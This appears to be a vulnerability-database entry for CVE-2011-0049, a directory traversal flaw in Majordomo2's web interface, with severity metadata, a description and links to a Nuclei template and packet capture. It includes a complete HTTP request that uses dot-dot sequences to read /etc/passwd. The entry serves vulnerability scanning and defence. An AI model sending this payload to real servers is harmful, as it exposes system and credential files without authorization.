| Title | Majordomo2 - SMTP/HTTP Directory Traversal |
|---|---|
| Author | pikpikcu |
| Severity | Medium |
| Impact | This vulnerability can lead to unauthorized access to sensitive files and data on the server. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.91269 |
| CVE ID | CVE-2011-0049 |
| CWE ID | CWE-22 |
| Tags | cve cve2011 majordomo2 lfi edb mj2 vuln |
A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.
GET /cgi-bin/mj_wwwusr?passw&list=GLOBAL&user&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-0049.yaml
🦈 Packet Capture: ⬇️ Download cve-2011-0049.pcap
N/AN/A